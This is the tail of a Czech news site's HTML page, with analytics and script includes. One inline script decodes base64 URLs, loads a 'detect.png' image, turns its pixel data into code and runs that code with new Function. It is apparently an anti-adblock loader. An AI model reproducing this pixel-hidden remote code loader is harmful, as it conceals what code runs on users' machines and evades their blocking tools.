	function gemius_pending(i) { window[i] = window[i] || function() {var x = window[i+'_pdata'] = window[i+'_pdata'] || []; x[x.length]=arguments;};};
	gemius_pending('gemius_hit'); gemius_pending('gemius_event'); gemius_pending('pp_gemius_hit'); gemius_pending('pp_gemius_event');
	(function(d,t) {try {var gt=d.createElement(t),s=d.getElementsByTagName(t)[0]; gt.setAttribute('async','async'); gt.setAttribute('defer','defer');
	 gt.src='https://gacz.hit.gemius.pl/xgemius.js'; s.parentNode.insertBefore(gt,s);} catch (e) {}})(document,'script');
	//--><!]]>
	</script>
<div id="tracy-debug"></div>
<script src="https://g.denik.cz/webtemp/jsloader-1f2d19e42892-1554279227.js"></script>
<link rel="stylesheet" type="text/css" href="https://g.denik.cz/webtemp/cssloader-ba43a7b4e7c9-video-js-1539344493.css">
<script src="https://g.denik.cz/webtemp/jsloader-85c53b0bf1d7-1553688827.js"></script>
<script type="text/javascript">initCookies('responsive');</script>
<script>
	!function(n,Z){n.btoa;var a=n.atob,t=n[a("YWRiX2RlYnVn")],e=["aHR0cHM6Ly9kM2V5ZDk2MXdpMTBibC5jbG91ZGZyb250Lm5ldC9nZW4vZGV0ZWN0LnBuZw==","aHR0cHM6Ly9kMWRhZW9uYnFjcTBvaC5jbG91ZGZyb250Lm5ldC9nZW4vZGV0ZWN0LnBuZw==","aHR0cHM6Ly9jZG4uZG9wYy5jei9nZW4vZGV0ZWN0LnBuZw=="];function i(){var n=a(e.shift());if(n){var t=new Image;t.onload=function(){var n,t,a,e,i,o,r;n=this,t=Z.createElement("canvas"),a=t.getContext("2d"),e=n.width,i=n.height,(o=t.style).width=t.width=e,o.height=t.height=i,a.drawImage(n,0,0),r=function(n){for(var t="",a=0;a<n.length;a++)(a+1)%4!=0&&n[a]&&(t+=String.fromCharCode(n[a]));return t}(a.getImageData(0,0,e,i).data),new Function(r).call({loader:1,ver:"v0.1.663"})},t.onerror=i,t.crossOrigin="Anonymous",t.src=n}}t&&(e=["L2dlbi9kZXRlY3QucG5n"]),i()}(window,document);
</script>

</body>
</html>
